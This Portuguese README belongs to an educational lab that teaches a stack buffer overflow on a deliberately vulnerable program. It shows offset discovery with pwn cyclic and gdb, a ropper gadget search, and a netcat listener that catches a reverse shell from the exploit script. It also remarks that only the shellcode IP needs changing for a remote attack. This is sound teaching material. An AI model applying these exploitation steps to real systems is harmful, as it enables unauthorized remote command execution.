# vuln-example
Exemplo de um programa simples vulnerável a buffer overflow

## Setup (Kali Linux)
### Dependências
```
sudo apt install gcc-multilib python3-pwntools ropper
```

### Compilar
```
make
```

### Executar
O programa escreve para _stdout_ a primeira linha que recebe em _stdin_.
```
echo "[INPUT AQUI]" | ./vuln
```

### Encontrar offset
```
$ pwn cyclic 300
[copiar padrão]
$ gdb vuln
(gdb) r <<< [colar padrão]
[SIGSEGV]
(gdb) p $eip
[copiar valor hexadecimal (0x????????)]
(gdb) quit
$ pwn cyclic -l [colar valor hexadecimal]
[guardar valor obtido (offset)]
```
**Nota:** Há varios plugins que facilitam a utilização do gdb.
Eu uso o [pwndbg](https://github.com/pwndbg/pwndbg#how).

### Encontrar o endereço de _return_
Temos de encontrar um endereço estático que contenha uma das seguintes instruções:
+ `jmp esp`
+ `call esp`
+ `push esp` (...) `ret`

No nosso caso só existe a terceira opção.
```
$ ropper -f vuln --search "push esp"
```
Para usar em python temos de escrever os bytes de trás para a frente
e com '\x' antes de cada byte. Exemplo:
```
0x12345678
```
seria
```
b"\x78\x56\x34\x12"
```
(b antes das aspas significa bytes)

## Exploit

### Iniciar o _listener_ no porto TCP 4444
Num outro terminal:
```
nc -vlp 4444
```

### Executar o exploit
```
./genpayload.py | ./vuln
```
Depois disto o nosso _listener_ vai receber uma conexão.
Podemos agora executar comandos "remotamente".

**Nota:** a conexão é feita para o _localhost_ (127.0.0.1).
Num programa acessível pela rede seria necessário alterar
o endereço IP no _shellcode_ para ser realmente remoto.
